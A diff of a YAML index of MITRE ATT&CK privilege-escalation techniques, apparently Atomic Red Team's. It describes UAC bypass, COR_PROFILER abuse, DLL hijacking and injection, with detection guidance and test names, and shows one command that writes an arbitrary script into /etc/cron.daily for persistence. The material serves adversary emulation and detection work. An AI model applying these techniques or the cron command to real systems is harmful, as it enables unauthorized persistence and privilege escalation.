- Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
-
- * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
-
- Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
- id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:11:48.618Z'
+ modified: '2020-06-25T19:57:54.510Z'
created: '2020-01-30T14:24:34.977Z'
x_mitre_platforms:
- Windows
@@ -1386,8 +1394,121 @@ privilege-escalation:
'
name: powershell
+ T1574.012:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1574.012
+ url: https://attack.mitre.org/techniques/T1574/012
+ - source_name: Microsoft Profiling Mar 2017
+ url: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview
+ description: Microsoft. (2017, March 30). Profiling Overview. Retrieved June
+ 24, 2020.
+ - source_name: Microsoft COR_PROFILER Feb 2013
+ url: https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)
+ description: Microsoft. (2013, February 4). Registry-Free Profiler Startup
+ and Attach. Retrieved June 24, 2020.
+ - source_name: RedCanary Mockingbird May 2020
+ url: https://redcanary.com/blog/blue-mockingbird-cryptominer/
+ description: Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved
+ May 26, 2020.
+ - source_name: Red Canary COR_PROFILER May 2020
+ url: https://redcanary.com/blog/cor_profiler-for-persistence/
+ description: Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation
+ for persistence. Retrieved June 24, 2020.
+ - source_name: Almond COR_PROFILER Apr 2019
+ url: https://offsec.almond.consulting/UAC-bypass-dotnet.html
+ description: Almond. (2019, April 30). UAC bypass via elevated .NET applications.
+ Retrieved June 24, 2020.
+ - source_name: GitHub OmerYa Invisi-Shell
+ url: https://github.com/OmerYa/Invisi-Shell
+ description: Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24,
+ 2020.
+ - source_name: subTee .NET Profilers May 2017
+ url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
+ description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
+ Profilers. Retrieved June 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: COR_PROFILER
+ description: |-
+ Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
+
+ Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)
+ id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-26T16:09:58.920Z'
+ created: '2020-06-24T22:30:55.843Z'
+ x_mitre_detection: 'For detecting system and user scope abuse of the COR_PROFILER,
+ monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and
+ COR_PROFILER_PATH that correspond to system and user environment variables
+ that do not correlate to known developer tools. Extra scrutiny should be placed
+ on suspicious modification of these Registry keys by command line tools like
+ wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring
+ for command-line arguments indicating a change to COR_PROFILER variables may
+ aid in detection. For system, user, and process scope abuse of the COR_PROFILER,
+ monitor for new suspicious unmanaged profiling DLLs loading into .NET processes
+ shortly after the CLR causing abnormal process behavior.(Citation: Red Canary
+ COR_PROFILER May 2020) Consider monitoring for DLL files that are associated
+ with COR_PROFILER environment variables.'
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_contributors:
+ - Jesse Brown, Red Canary
+ x_mitre_platforms:
+ - Windows
+ atomic_tests: []
T1546.001:
technique:
+ created: '2020-01-24T13:40:47.282Z'
+ modified: '2020-01-24T13:40:47.282Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ type: attack-pattern
+ id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
+ description: "Adversaries may establish persistence by executing malicious content
+ triggered by a file type association. When a file is opened, the default program
+ used to open the file (also called the file association or handler) is checked.
+ File association selections are stored in the Windows Registry and can be
+ edited by users, administrators, or programs that have Registry access (Citation:
+ Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
+ by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
+ Oct 2017) Applications can modify the file association for a given file extension
+ to call an arbitrary program when a file with the given extension is opened.\n\nSystem
+ file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
+ for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
+ for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
+ various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
+ For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
+ HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
+ values of the keys listed are commands that are executed when the handler
+ opens the file extension. Adversaries can modify these values to continually
+ execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
+ name: Change Default File Association
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1546.001
@@ -1411,37 +1532,6 @@ privilege-escalation:
description: Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August
8, 2018.
source_name: TrendMicro TROJ-FAKEAV OCT 2012
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Change Default File Association
- description: "Adversaries may establish persistence by executing malicious content
- triggered by a file type association. When a file is opened, the default program
- used to open the file (also called the file association or handler) is checked.
- File association selections are stored in the Windows Registry and can be
- edited by users, administrators, or programs that have Registry access (Citation:
- Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or
- by administrators using the built-in assoc utility. (Citation: Microsoft Assoc
- Oct 2017) Applications can modify the file association for a given file extension
- to call an arbitrary program when a file with the given extension is opened.\n\nSystem
- file associations are listed under HKEY_CLASSES_ROOT\\.[extension],
- for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler
- for that extension located at HKEY_CLASSES_ROOT\\[handler]. The
- various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\\shell\\[action]\\command.
- For example: \n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n*
- HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe
- values of the keys listed are commands that are executed when the handler
- opens the file extension. Adversaries can modify these values to continually
- execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)"
- id: attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: persistence
- modified: '2020-01-24T13:40:47.282Z'
- created: '2020-01-24T13:40:47.282Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -1528,6 +1618,19 @@ privilege-escalation:
phase_name: initial-access
modified: '2020-03-23T21:59:36.729Z'
created: '2020-03-13T20:36:57.378Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
+ or malicious activity, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -1535,19 +1638,6 @@ privilege-escalation:
- SaaS
- Azure AD
- Office 365
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1546.015:
technique:
@@ -1593,18 +1683,12 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-16T14:19:22.457Z'
+ modified: '2020-07-09T13:55:51.172Z'
created: '2020-03-16T14:12:47.923Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - ENDGAME
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Loaded DLLs
- - DLL monitoring
- - Windows Registry
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
(ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary
@@ -1620,10 +1704,16 @@ privilege-escalation:
if software DLL loads are collected and analyzed, any unusual DLL load that
can be correlated with a COM object Registry modification may indicate COM
hijacking has been performed. "
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Loaded DLLs
+ - DLL monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Elastic
+ x_mitre_platforms:
+ - Windows
identifier: T1546.015
atomic_tests:
- name: COM Hijack Leveraging user scope COR_PROFILER
@@ -1770,47 +1860,37 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-26T21:28:19.476Z'
created: '2020-02-18T16:48:56.582Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - Access tokens
- - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Windows User Account Control
+ - System access controls
+ - File system access controls
x_mitre_detection: |-
If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.
Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
- x_mitre_defense_bypassed:
- - Windows User Account Control
- - System access controls
- - File system access controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Access tokens
+ - API monitoring
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1543:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1543
- url: https://attack.mitre.org/techniques/T1543
- - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
- description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
- source_name: TechNet Services
- - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
- July 10, 2017.
- source_name: AppleDocs Launch Agent Daemons
- - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
- description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
- OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
- source_name: OSX Malware Detection
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Create or Modify System Process
+ created: '2020-01-10T16:03:18.865Z'
+ modified: '2020-03-25T22:32:16.537Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
description: "Adversaries may create or modify system-level processes to repeatedly
execute malicious payloads as part of persistence. When operating systems
boot up, they can start processes that perform background system functions.
@@ -1826,15 +1906,25 @@ privilege-escalation:
under root/SYSTEM privileges. Adversaries may leverage this functionality
to create or modify system processes in order to escalate privileges. (Citation:
OSX Malware Detection). "
- id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T22:32:16.537Z'
- created: '2020-01-10T16:03:18.865Z'
+ name: Create or Modify System Process
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1543
+ url: https://attack.mitre.org/techniques/T1543
+ - url: https://technet.microsoft.com/en-us/library/cc772408.aspx
+ description: Microsoft. (n.d.). Services. Retrieved June 7, 2016.
+ source_name: TechNet Services
+ - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
+ description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
+ July 10, 2017.
+ source_name: AppleDocs Launch Agent Daemons
+ - url: https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf
+ description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
+ OS X Malware Detection & Analysis. Retrieved July 10, 2017.'
+ source_name: OSX Malware Detection
x_mitre_platforms:
- Windows
- macOS
@@ -1885,12 +1975,11 @@ privilege-escalation:
phase_name: privilege-escalation
modified: '2020-03-23T23:30:46.546Z'
created: '2019-12-03T14:25:00.538Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_remote_support: false
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -1901,11 +1990,12 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
- x_mitre_permissions_required:
- - User
- x_mitre_remote_support: false
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -1957,6 +2047,30 @@ privilege-escalation:
command: echo "#{command}" > /etc/cron.daily/#{cron_script_name}
T1574.001:
technique:
+ created: '2020-03-13T18:11:08.357Z'
+ modified: '2020-03-26T16:13:58.862Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
+
+ There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
+
+ Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
+
+ If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
+ Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+ name: DLL Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.001
@@ -1987,30 +2101,6 @@ privilege-escalation:
url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html
description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking
Revisited. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: DLL Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
-
- There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-
- Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)
-
- If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
- Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
- id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T16:13:58.862Z'
- created: '2020-03-13T18:11:08.357Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -2087,23 +2177,23 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T16:23:21.010Z'
+ modified: '2020-06-20T22:05:42.513Z'
created: '2020-03-13T19:41:37.908Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Loaded DLLs
- - Process monitoring
- - Process use of network
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Monitor processes for unusual activity (e.g., a process that
does not use the network begins to do so). Track DLL metadata, such as a hash,
and compare DLLs that are loaded at process execution time against previous
executions to detect differences that do not correlate with patching or updates.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Process whitelisting
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process monitoring
+ - Process use of network
+ x_mitre_platforms:
+ - Windows
identifier: T1574.002
atomic_tests:
- name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -2170,6 +2260,20 @@ privilege-escalation:
phase_name: initial-access
modified: '2020-03-23T21:37:34.567Z'
created: '2020-03-13T20:15:31.974Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_detection: Monitor whether default accounts have been activated or logged
+ into. These audits should also include checks on any appliances and applications
+ for default credentials or SSH keys, and if any are discovered, they should
+ be updated immediately.
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -2180,23 +2284,30 @@ privilege-escalation:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_detection: Monitor whether default accounts have been activated or logged
- into. These audits should also include checks on any appliances and applications
- for default credentials or SSH keys, and if any are discovered, they should
- be updated immediately.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1078.002:
technique:
+ created: '2020-03-13T20:21:54.758Z'
+ modified: '2020-03-23T21:08:40.063Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ type: attack-pattern
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ name: Domain Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
@@ -2213,27 +2324,6 @@ privilege-escalation:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Domain Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- modified: '2020-03-23T21:08:40.063Z'
- created: '2020-03-13T20:21:54.758Z'
x_mitre_platforms:
- Linux
- macOS
@@ -2287,12 +2377,13 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T15:32:06.115Z'
+ modified: '2020-06-20T22:06:47.115Z'
created: '2020-03-16T15:23:30.896Z'
- x_mitre_defense_bypassed:
- - Process whitelisting
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_data_sources:
+ - Process monitoring
+ - File monitoring
x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to
detect potential cases of dylib hijacking. Monitor file systems for moving,
renaming, replacing, or modifying dylibs. Changes in the set of dylibs that
@@ -2300,14 +2391,37 @@ privilege-escalation:
with known software, patches, etc., are suspicious. Check the system for multiple
dylibs with the same name and monitor which versions have historically been
loaded into a process. '
- x_mitre_data_sources:
- - Process monitoring
- - File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_defense_bypassed:
+ - Application control
atomic_tests: []
T1055.001:
technique:
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
+ in order to evade process-based defenses as well as possibly elevate privileges.
+ DLL injection is a method of executing arbitrary code in the address space
+ of a separate live process. \n\nDLL injection is commonly performed by writing
+ the path to a DLL in the virtual address space of the target process before
+ loading the DLL by invoking a new thread. The write can be performed with
+ native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
+ then invoked with CreateRemoteThread (which calls the LoadLibrary
+ API responsible for loading the DLL). (Citation: Endgame Process Injection
+ July 2017) \n\nVariations of this method such as reflective DLL injection
+ (writing a self-mapping DLL into a process) and memory module (map DLL when
+ writing into process) overcome the address relocation issue as well as the
+ additional APIs to invoke execution (since these methods load and execute
+ the files in memory by manually preforming the function of LoadLibrary).(Citation:
+ Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July
+ 2017) \n\nRunning code in the context of another process may allow access
+ to the process's memory, system/network resources, and possibly elevated privileges.
+ Execution via DLL injection may also evade detection from security products
+ since the execution is masked under a legitimate process. "
+ name: Dynamic-link Library Injection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1055.001
@@ -2321,37 +2435,13 @@ privilege-escalation:
description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
7, 2017.
source_name: Endgame HuntingNMemory June 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Dynamic-link Library Injection
- description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
- in order to evade process-based defenses as well as possibly elevate privileges.
- DLL injection is a method of executing arbitrary code in the address space
- of a separate live process. \n\nDLL injection is commonly performed by writing
- the path to a DLL in the virtual address space of the target process before
- loading the DLL by invoking a new thread. The write can be performed with
- native Windows API calls such as VirtualAllocEx and WriteProcessMemory,
- then invoked with CreateRemoteThread (which calls the LoadLibrary
- API responsible for loading the DLL). (Citation: Endgame Process Injection
